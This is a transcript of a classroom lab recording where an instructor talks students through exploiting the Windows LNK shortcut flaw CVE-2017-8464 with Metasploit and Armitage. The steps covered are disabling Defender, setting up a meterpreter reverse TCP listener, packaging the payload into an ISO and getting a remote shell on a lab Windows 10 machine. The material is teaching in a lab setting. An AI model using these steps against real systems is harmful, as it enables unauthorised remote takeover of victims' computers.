Zoom record. Okay. Well, I've got share going on, and I've got it recording. Well, let's go look. Let's go look at vulnerabilities out there in the wild. Let's go to websites. CVE details.com. Yeah, CVEdetails.com. Whole bunch of IT vendors like Intel, AMD, Microsoft, Oracle, Facebook, all those people got together and they come up with common vulnerability something, E, whatever E stands for, Open Vulnerable and Assessment Language. So this site right here is great for looking up exploits on what's been reported on companies and stuff. And you can also check the, hey, do I need to patch my system or not? And check to see if you're protected. Let's enter in, we're running Windows 10, and the one we're on to exploit the 1607 build. So you just type that in the search bar and click the first link up here, Microsoft Windows 1607 security vulnerabilities. They list 820 results of flaws they found so far in that version. Of course, some of them are low. I don't want to look at the low stuff. I want to look at that's 9 or higher, severe vulnerabilities. And there's 172 of those, just a few. Of course, the last one was back in October last year. It's been reported. And just letting you know that they're out there and new ones are continuously put up there. And the danger part is one that like just came out and you don't have protection for it yet. If I look around page 3, I'll show you the one that we're going to be working on. It's 2017. I said 3 years ago. 2017 8464. So this one, we're going to exploit a shortcut vulnerability that somebody found. They found a way to simply just look at a shortcut, open it up and explore, not click on it, just look at the shortcut. And as the shortcut loads into RAM to do like the picture preview on it, it will load up a exploit and connect back to a hack machine. So that's pretty nasty exploit that you just look, you don't even click on the file, you just look at the file's picture and you're ruined. But we're protected from that now with patches and Windows Defender and stuff like that. So we're, like I said, Mr. Rogers, we're going to simulate that this is 0-day and Windows Defender and stuff like that's not going to protect us. Because things like this can still come up and be found and be pushed out there. Well, let's get our Windows 10 set up so that we can actually be exploited. We'll need to do a couple things on Windows 10. One of them, let's first open up File Explorer. Now just make sure everything is ejected. Like all the CD-ROMs and stuff were ejected. That we only have a C drive under this PC. Well, I have an F drive there, but make sure everything's ejected and you don't have anything showing up at C drive in your list. The next thing, and it's not real critical that it's ejected, but I just want to make sure it's all like a clean slate when we get running into hack. Next thing, we need to shut down Defender. So I'll search for Windows Defender. When it launches, it'll probably pop up and let you know that Defender's good and the virus definitions are up to date. And to simulate that a 0-day exploit or something's come along, we're going to turn Windows Defender off. You would not ever want to do this in real life. We just do it in lab life. This is lab life. Okay, turn off all the sliders. If anything is turned on, slide it off. And then Defender should turn red and go, you're not protected. We got our Windows Update turned off. We got the firewall turned off. Now I've turned off Windows Defender. So this is a lot of work to turn off all these protections, but
why does it look very good?
if yours stays green after turning off all of the sliders, then you may have to restart Windows 10 and try again. I had two other machines that had to do that. They had to restart Windows 10. Okay, so Defender should turn red, and that means Windows is ready to be attacked. I'm going to leave Windows Defender up just in case it auto tries to turn itself back on. And I'm going to minimize Windows 10 for now. So I need to prep Kali Linux for attacking. The first thing I'm going to do is open up a little notepad, text editor, and Kali, and write down the two IP addresses. I'm going to write down my Kali address, which is the one that's going to be waiting for a connection from a compromised machine. You find your Kali Linux address. I hope you remember how to get your IP address in Linux. IP80 address list. You can abbreviate address, ADDR, IP-ADDR list. Record down your Kali Linux IP. You should be a 1010.1 dot something on your Kali. I know you're getting the right IP address. And you can record down your Windows 10 address.
Mine's still green.
By clicking on, you can click your Windows 10 and then down in the bottom part of here at Hyper-V, bottom center, you'll see a networking tab button that you can click and you can quickly see the address, or you could go into Windows 10 and look up the IP address. Let's go check out Talon. Why is your Windows 10 still green? Do you have the slider still on?
That was off, I swear. I turned everything off. There it goes. It's gone right now.
Okay. IP address list. So everybody get those addresses recorded that we can use later.
No.
Okay, once you got all of those addresses recorded, then we can start doing some more preps on our Kali Linux. One of the things the hack recommends that we put these files on a thumb drive, so somebody can stick the thumb drive in. We're working between these two virtual machines. I'm just going to make an ISO file and download the ISO file to Windows and mount it. It'll be pretty much simulating putting any type of removable media into your computer. So let's first start by installing a command line tool for creating ISO images in the Kali, and that is simply apt install XORR ISO. And that will install some command line tools, and we can create ISO images with that tool. It should pop up and ask you a yes or no, and you just click yes to install.
Why does the information denied?
Did you log into root?
No.
Oh, well, you could open up a prompt and do like SU space minus there and switch over to root account, I guess. Yeah. Should be your pass 1, 2, 3, 4. I guess you have a different root. Did you ever set the root password?
May not have.
You ever do a sudo passwd root? Put the student password in there, whatever it is, and then it will ask you for the root password twice. And that'll let you switch over. Okay, so you've got the app install XORRISO. The next thing, Rapid7 is a company, they create the Metasploit Framework and penetration testing tools, and they've got 3 different flavors of their penetration testing tool out there. One of them costs, I think, up into the 5 or 6 figures for a yearly licensing fee for it. But we're going to use the free version of it, and it uses Postgres database engine to run and generate a database and keep track of all of the exploits and the computers and the code and stuff that you're hacking. So on Kali Linux, we need to set it up to where the database server will always start. So that's the system control enable Postgres SQL. And after we configure it to always start across reboots, then we'll go ahead and start the database server by system control start Postgres SQL. The one highlighted is required. The start is kind of optional because the next command would have started it if it wasn't started. Next command is what's known as Metasploit Framework, MSF, and then DB for database, space init. That actually connects to the Postgres database engine, and it generates the database itself, creates all the tables and all of the user accounts and passwords and security, and generates a database for the Metasploit framework. And once that's finished initializing the database and you have your command prompts back, you can actually start up the Metasploit console just to make sure it starts up, and you'll get a banner on the screen. I've already done the previous preceding steps, so all I have to type is MSF console and let it launch. And it'll do cool little stuff like that on the screen while it's initializing. And everybody will have a different banner. Mine just says Metasploit in cyan color.
Mine has some kind of goat or dog or something.
Let's see. That's a cow.
Goat or dog or something. What?
Yours comes with super cow powers. So I have seen that pop up before. Super cow powers. Yes.
It's not like it's an actual like high quality picture that I can be like, oh, that looks like a cow. Like it's a bunch of just text shaped as a cow. Like how is that supposed to know it's a cow?
I wanted to be different instead of just like super one.
Okay, so we've got the MSF console initialized. I'll need to open up another tab and let's go to File, New tab. Let's leave the Metasploit up, and you'll go to another tab so you can continue installing some more stuff. Probably should have installed that first before you did Metasploit console, but it doesn't matter. Armitage is a graphical front end. It's got some issues. It was last updated in 2015. long time ago. And it's got some issues that we'll have to try to work through and make it work. I suspect that they will stop including it in Kali Linux pretty soon. There's no maintaining it. But it still has a nice graphical front end, and I've not been able to have the time to research the web front end for Metasploit. It doesn't appear to be included with Kali Linux. I don't know, but app install Armitage, and then go ahead and run Armitage. When you run Armitage, it will ask you to log in, and it's already have all of the information pre-filled. If you remembered when you did the MSF DB init, it said creating MSF user and setting password and all that. Armitage is pre-coded with that information in there, so just connect, and it'll say, hey, you don't have an RPC server. I can start it for you if you want to, or we can just not work. You want to work? Yes, or do you not want to work? No. We want to work, yes. It'll come up and it probably will show that show some cool stuff. It's mostly just black boxes and a white box with like some folders in it. It takes a little bit. Okay, cool. Well, it's still taking a little while. There mine goes. I've got some black squares. I may have a computer pop on mine, but it's okay if you don't have anything there. It's perfectly fine not to have a blank. That's neat. So Armitage is a tool that you're supposed to find exploits, and you can create them or drag and drop them onto a machine that you've already got there and attempt to scan computers for different things. But again, it's 5 years old and it's way outdated, so we're going to have to kind of muddle through. Olden days, before they started the CVEs and everybody agreed upon how to name any new flaws and stuff that are found in the world, each company had their own designation for exploits. Like Microsoft used to be Microsoft followed by the year, followed by the exploit number. So if I do like Microsoft 16, so it'll be for 2016, and I see several exploits out there. However, whenever you get up to like MS 18, well, there is an MS 18, 19. There's nothing on 19. Somewhere between 16 and now, people started universally switching over to CVE. If I look for CVE 2015, I notice there's nothing, right? If I go to 2016 though, oh, nothing. 2017, there we go. About 2017 when people started using CVEs in the system. And of course, Armitage was written last updated in 15, so this is already exploit a couple years newer than the last time Armitage was reworked. So there's our icon. Remember we talked about the 8464, 2016, and that other website? So there's not all CVEs have an exploit and Metasploit. They're just some of the CVEs are maybe not worth creating a remote exploit for, or somebody just didn't take the time to make a full exploit for it. But they did for this one, because I guess it's really evil. I know we've got 2 of them up here. One of them's for local, meaning guess you're running Metasploit on the Windows 10 machine itself and exploiting, trying to raise your account that you're sitting there on. If you've got a regular user and you want to become system or something. The next one up here is R. I guess that's for remote. It means you have a remote Kali sitting there waiting for somebody to look at a thumb drive or a DVD with an exploit on it and then phone home. and get attacked. That's the one we're wanting to do. We're wanting Windows 10 to talk back to Kali. Let's double click the link. Yeah. Trying to resize it so I can see it a little bit better. So basically all the information about the CV, there's a vulnerability in the way that Windows handles the shortcut. So the shortcut links to a DLL to pass information back and forth, like what kind of icon should be there. It's able to execute some code, and that code can communicate back to Kali and let the machine be taken over. Now down here in the bottom, the target's real important here. Change your target to 64-bit.
What if it did 84?
It wouldn't work.
So like you said,
It's important because if we pick the wrong one, it's not going to work. That's why it's important. The file name, I don't like file names with spaces, and I can rename it anything I want, but just because I don't like spaces and things, I'm going to take the space out. Fix the file name. Other stuff in here. Oh, look, that's my Kali address. Is that the one you recorded down for you? I mean, not the one on my screen, but on your screen. It should match up to what you put in your notepad file. And then down here at the local port, mine's just a random number above 1024, but Armitage won't start up a listener on that port, but it'll generate this this hack file to try to communicate back onto that number. So I'm going to put this into a nice even number that I can remember, like 5,000. Because I'll have to manually start a listener up. Just because Armitage is so old, it's not doing that anymore. And I'm not a programmer to fix the problem. The payload right here is also wrong. I guess it was created before that Metasploit created a separate folder for 64-bit payloads. So right up here by Windows, you'll have to double click, and right in front of meter preader there, I'm going to put x64 / Windows /x64 / meter preader. So I just had to put that x64 between Windows and meter preader. And that way it will load up the correct vulnerability that will run correctly on the Windows 10 64-bit edition. That's really all the changes. The only main changes we really did was the local port and the x64 there and the drop down. I did take the space out just because I don't like spaces. Everybody got that set up? Okay, if we just click launch this time, it will generate the payload, and it'll generate a whole bunch of files like D through Z, that's shortcut links, and then it'll generate the CPL file. All of those different files are hard-coded to access that CPL from like a different drive letter. So no matter what drive Windows chooses for the thumb drive or SD card or CD-ROM or whatever, it will run the exploit. That's the reason for each one of them. If I scroll up a little bit, it should say started a reverse TCP handler on something 5,000. Everybody should see that. Now let's go actually look in our terminal window. On my terminal window, I'm going to open up another tab because my first two tabs are busy doing stuff. And I'm going to make sure that the 5,000 isn't actually listening. It probably isn't. It should be, probably not. There's several different ways you can look up open ports. Netstat is one of them. This is a different one that's maybe more modern. List open files, that you can tell it to list only internet files with a -I, and then a list only ports with a dash capital P, and then a dash N. You don't want the ports to be resolved. Basically, you don't want to see HTTPS or SSH. You just want to see port 80 or whatever. I believe that's all the switches. If I hit enter on that, it's going to give me every port that's attached to a service in Windows, I mean Linux running. There's quite a few of them in there. And that's more than I want to look at. So I'm actually going to narrow it down. I'm going to clear my screen, hit my up arrow a couple times. Instead of looking at everything, I only want to look at the listening ports. And I've seen that there was words out there that said listen on a few of them. So let's type it to grep. And listen was in all uppercase when I looked at all of it. So I'm going to say only show me listening ports. And do you see port 5000 in the list?
No.
5432, 55,000, 530, 553. So yeah, Armitage didn't do its job. Didn't quite do its job just right. Well, let's get Armitage to listen. Oh yeah, don't ever close Armitage out.
What was that command you do back there?
Armitage?
Oh, on the MS?
No, just Armitage. It's in a blank shell, not in the MSF. You have to be in just a regular terminal. I'm not gonna top Armitage. Okay, inside of Armitage, down in this bottom part, you'll notice you have two tabs here. One of them says console. Go and click console. We'll start the listener up in here. We also had the Metasploit Framework. I could start a listener here, but I found Wednesday that if I start it here, it doesn't link with Armitage and doesn't do everything that all the cool stuff. It's a little bit cooler. You have some better visualization if it shows up in Armitage after the attack happens. It's cool both ways, but it's a little bit better here. So inside of Armitage, we've got a couple of commands that we can do. There's my little notes on the LSOF with the IP and N to look at open ports. But at our Metasploit prompt, ours happens to be an MSF5 prompt, we'll type in use multi-handler. So I'll type in use multi-handler. And as I hit enter, I'll watch my console screen, and after a couple of seconds, it'll tell me it's using the configured payload, generic shell reverse, and my prompt will also change from MSS5 greater than to the exploit multi-handler there in parentheses. And the little notes on it, it's using something called generic shell reverse TCP, but I want to change that to use the 64-bit meter preter shell. So I would type set payload and then Windows x64 ME, and I can start hitting tab about the time I tap ME, and it should autocomplete meter preter. And you should be able to put a /RE and hit tab and continue tabbing until you get to reverse _ TCP. I'm going to go and do that into mine here. Set payload Windows x64 ME, and I'm going to hit tab, wait, and it should complete out. Yep. Oops. There you go. I'll tab until I get meter preter, and then I'll tap RE and tab again until it goes to TCP, hitting enter. So you can see the console output, what happens when I typed it in. It'll see payload, and it'll show the Windows x64 meter reader, reverse TCP. And when I use my tab complete, I know that everything was spelled correctly and the path statements were correct. And then I need to set the local host IP address. It is case sensitive. Check your notepad for your correct IP address for your Kali Linux. So you see I said set lhost, and I'll type the IP address of the Kali Linux. Not the Windows machine, Kali Linux. We're trying to let it know what the IP address of the server is, which is itself. So listen on that network adapter. And then we need to tell to listen on port 5000. So set the local port or L port to 5000. And it'll just echo it, your command basically to the screen. And then if you type exploit, it should tell you that it started up a listener on port 5000. My Windows, yours probably started at the first asterisk up there. My Windows is still attacked from Wednesday. It just reconnected. I don't want to see quite you to see the cool stuff yet. How do I hide that so you don't see the cool icon in the background? You know, let's check out Mr. Talon, see how you're doing. So yours says starting reverse TCP handler on 72:5000, looks perfect. Has everybody else got a listener going? We're good? Yeah, you didn't put your IP address. Oh, the T is lowercase. Wait, was it 35? Thought your Kali was, okay, yep, 35. Now type exploit and it should work. Yep, cool. Okay, so now we're sitting there waiting for a connection. Now go back to your terminal and you may have to open up another tab, I don't know, but get to a prompt that's not being utilized. I made my prompt where I did that LSOF. Before we do it, I see that port 5000 is not listening on mine because my Windows machine already connected. But you should have a 5000 in your list. It should show listening. But I don't grep mine and look, I'll see that mine had already talked back to me. Trying to find my 5000 in here. I could have grepped 5000. That would have been simpler than trying to scan everything. So mine's established. It was no longer listening because my Windows 10 is already exploited. But you should have had a listen at 5000, did you? Elon's like, yep. Matthew's, yep. Okay. Okay, what I need to do on my Armitage, if I looked over on this window here, it told me that all these files were put under root.msf4/local, and they were all in that folder. So on my terminal window, we're already in the root folder. So you just need to do cd space dot Metasploit Framework 4/local and hit enter. And it should change you to the local directory. Well, that's the prompt that popped up after I hit enter, meaning that I'm logged in as root. And if you type ls, you see all of the files. I think I'm getting a lot of emails. So with all of those files in the list, we need to make an ISO image out of that. You don't have to type this, I have remnants left over from the last class I just deleted. So you'll have everything. You won't have that ISO file I had. You'll just have those files in the list, the CPL file and then a whole bunch of link files, D through Z. So if you type ls and you see all those files, you're good to go to this next part. The next part is using that X or ISO file system. And that would be XORRISOFS file system with the -L. I did find, and if you don't put the -L, it cuts the file names 8 characters long, and they don't work because they're hard coded to have the full name for the exploit to work. So you have to put -L so the CD image keeps the long file names, and then a -O, the letter O, little o for output. You give the name of your ISO image with the .iso at the end. And since we're in the folder with all of those files, you can just simply put asterisk and it'll say grab all the files and dump them into that ISO image that you create. I picked a really cool, awesome word of test to be my ISO image. I know, great stuff. So that was XORRISO file system -L little o like test.iso space asterisk. They grab everything in the folder, get into test, make it an ISO image, and hit enter. It added all those files and built up ISO 9660, I think, format CD-ROM image. Now you could either burn that to an actual CD disk, or you could just ship it over to Windows and mount it as an image. And that's what we're going to do. We're going to mount that as an image. So I'm going to clear the screen. Python is included with Kali and most Linux distros, and Python can start up a HTTP server really quick out of a folder simply by typing python -m and loading up a simple HTTP server. So literally simple with a capital S, the letters in uppercase HTTP, and then the word server with the S again and the word server uppercase. And there it is, a little bit bigger print for you on the notepad. Python -m simple HTTP server. Now you do have to be in that same directory that ISO file and all those files are in. because it'll create the server just based on that folder, not anything else. If we hit enter, it should say you started up listing on port 8000. That's a little tricky. It's not using port 80 or 443. So when we access that from a web browser in another computer, you're going to have to put :8000 at the end of the IP address or host name for it to be able to connect. Also, because it's not port 80, you're going to have to specify and type in http:// so that the browser knows that it needs to communicate an HTTP protocol, because it's not running on port 80 or 443. You got to be real specific. Otherwise, browsers will automatically try to run a search in the search engine for what you type in. Let's go ahead and go to our Windows 10. We're about to our exploit time. Make sure your Windows Defender is still red. And if it's still red, launch Internet Explorer. Because that's the only browser we have on our base install. And as I said, you have to type in the actual HTTP : / portion, because we're not running on the standard port 80. You type in your Kali Linux server address, followed by a colon and 8000. And when you hit enter, it should show all the files that were in your directory. I found that to be probably our quickest, easy way to get things from Kali over to Linux. Just a simple web link. You only need the ISO file. Because remember, we put all those other files inside that ISO image. And that's what's going to give us our drive letter. So just download the ISO image and save it. Or you could open it. You save or open either one. It'll mount it if you open it. If I go open up folder, all I have to do is right click and click mount, and it'll mount it as a drive letter. And I don't have to open up I don't have to click on anything. All I have to do is just look at it. And as you look at it, if you go back to your Kali and look at your Armitage, an icon should start appearing in Armitage. And after a while, it should probably turn red to let you know that the computer was captured and hacked.
Hey, Mr. Jones?
Yep.
I'm not able to.
You put an S. It's not secure. There you go.
There we go.
Yeah. Almost everything is secure now. You want everything HTTPS, but that Python was really simple web server for quick local transfers. We'll go ahead and download your ISO file and click open when it comes up. And now go look at your Armitage in Kali Linux. So that's a lot prettier to watch a black screen and all of a sudden a computer window pop up and then it turns red and then it pops in what logo. Kind of surprised. Mine popped in the correct logo for Windows 10.
Yeah,
maybe I may have done some updates to my Kali that you didn't do, like an app update or upgrade. I may have later than what you have, possibly. I've played around with this more than y'all have, so.
But I've got two of them. I've got one that's
Something.
0.0.0.0. I've got one that's 10.10.1.60.
I don't know what the zeros is for, but it's black, so it's not connected. So yeah, that's pretty cool. So what can we do now? Well, when we got the computer, it means it's compromised. What can do here inside of Armitage, I can right click, and we got meter preader 1. That's the listener service when we did the Windows x86 meter preader reverse TCP. So that's what we want to look at. And there's lots of stuff we can do. But again, Armitage has been kind of flaky. I've tried to click some of these other things and it lost connection to the server. But interact and opening up a command shell does work without it dying off. I wish some of the other stuff would work, like taking a web screenshots or webcam shots and stuff, but I found those just killed it. We'll open up a command shell. Some of the other screenshots and stuff, we might have to execute another exploit on the Windows machine to get system root access to it. Once you get in like this, sometimes you don't have full privileges. I've seen some exploits of hacked Firefox before, but I was jailed into the Firefox cache folder. I couldn't get out of it. So I had to find some other exploits that Windows may be vulnerable to escalate my privilege on up to system or the NT Authority system account. So open up a command prompt. It probably dumped you into system 32. So you're probably at system 32, like I am on my screen. And what I would do here, just for your cool, awesome benefit stuff, is it'd probably minimize all your windows and move your Windows 10 to where that you can see the recycle bin area on the screen and your Kali Linux on the screen at the same time. And what I'm going to navigate to, I'll do a change directory, /users, and I'll hit enter. And that should bring me to C:\users. And this is DOS. DOS uses directory listing, dir, instead of ls. So you just have to use the old DOS command, dir, and look for the user account that you created when you installed Windows 10. I used Jim when I installed Windows 10.
I use ball.
Jim or James T. Kirk. Okay, so I'm going to change into that user accounts folder, Jim. And if I did another directory listing inside of Jim, I would find desktop. So I'm going to change into the desktop folder. And I can make a directory mkdir, like I'll just make a directory called hack. That's always what you want to see appear on your Windows machine, just random.
It did it. All right, I'm done.
But you legitimately logged into it.
Exactly.
You didn't bypass security and automatically have the other machine connect back to you automatically. At this point, I'm going to change into the hacked folder, and inside the hacked folder, well, I can open it up on Windows. And I'm just going to make my Explorer here where I can see the name column, see it's blank. I'm going to make a file in here, but I'll make a special file. I'm going to capture all of the connection settings to the machine. So I'm going to do a netstat-ano is the switch I want to add to it. Then I want to redirect the output of that command to a file. Maybe like net.txt or whatever file name .txt. So it's a netstat-ano to the net.txt. That will give me basically a connection status. I'll be able to see that I'm connected. I'll see the port 5000. And I put it in Notepad file so I can open it up in Windows and look at it a little bit better. So you know you've been hacked. You may run a netstat on your Windows machine, and of course Windows is going to have a lot of connections back to Microsoft. But weeding out which of your connections is actually the hacker machine might be difficult. But I found my port 5000 right here on that line. So that's my exploit running.
I don't see
Yeah, it's there. It's the foreign address 5,000. You got to look.
oh, right here.
Yeah, that line.
I was looking over here.
This is maybe a little bit of forensics. This is network forensics. Did teach a class network forensics so years and years ago, but kind of a network forensics type right here. You see the process ID? We learned about process ID in another class, operating systems. So process ID tells me what service is actually running to make that remote connection. Process ID 4732 on mine. Everybody will be different. And I'll open up Task Manager, and I'm going to see what program is running process ID 4732. You do that by going to Details, clicking your Details tab, and I'm going to sort by the process ID and go look for 4732. So I find that it's rundil32.exe. Looks like I got two rundil32.exes running. But that specific process right there is the one that's connecting back to my Kali Linux. If I was to kill it, I'd lose connection between the two.
For run
Mhm. Yeah. So the exploit did say that it was going to exploit a vulnerability with the links and DLL files. So I want to try to launch that in the DLL file, try to look and I guess register the icon graphic or something. It exploited this executable in Windows and allowed it to run what they call arbitrary code, meaning whatever the heck you want it to run. And what we wanted it to run was that meter preater connection back to the hack machine. So we'd have command and control. So with command, prompt, and control, I can now do whatever I want to the Windows 10. I can load other exploits. Now I have local access and internet access. I can load files to it and launch other exploits. Because you see this right here is running as Jim, right? Rundil32 is running as Jim. Of course, Jim's an administrator, but that's basically my command shell. I think I've just got Jim's rights. I don't have system rights. So I would need to try to run some more exploits locally to escalate myself all the way to. Then I could upload rootkits. Rootkits will will infect the kernel, and they will hide any of your stuff. So a rootkit running wouldn't show up as a process under details. Those are pretty bad. So you've got antivirus programs and stuff. It's kind of hard for them to find rootkits. They actually do have some special apps that can try to hunt down known rootkits in the wild and get them off your computer. Okay, this is an old exploit, and we had to do a lot of stuff to make it work. The stuff I meant to make it work is shutting down Defender and turning off Windows updates, stuff like that, to actually get this through. But again, I said, you got to think they're coming out with new exploits where they don't have a Defender definition. They don't have a Windows patch for it. So we have patches monthly. People come up with new ways just like this here to work. Why'd I pick this one? It's well documented, and a bunch of other people had done examples of it. So that's why we ran it. Just to make you think. So what do y'all think about it?
Very awesome. Very cool.
You should feel like you're a really big hacker now that you've got the little red icon with lightning bolts around it. That's why I like Armitage. I wish somebody would go around and fix it.